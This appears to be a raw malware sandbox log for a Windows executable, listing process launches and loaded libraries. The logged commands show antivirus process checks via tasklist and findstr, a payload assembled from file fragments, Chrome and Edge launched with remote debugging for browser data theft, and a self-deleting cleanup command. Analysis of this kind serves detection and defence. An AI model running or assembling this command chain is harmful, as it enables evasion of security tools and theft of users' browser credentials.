                Source: 3E3OP8QIM.11.dr, IEUKNGLFC.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: trZG6pItZj.exeReversingLabs: Detection: 18%
                Source: trZG6pItZj.exeVirustotal: Detection: 26%
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile read: C:\Users\user\Desktop\trZG6pItZj.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\trZG6pItZj.exe "C:\Users\user\Desktop\trZG6pItZj.exe"
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139308
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Frame" Ron
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Procedures.com j
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139308Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Frame" Ron Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting jJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Procedures.com jJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comSection loaded: sfc_os.dllJump to behavior
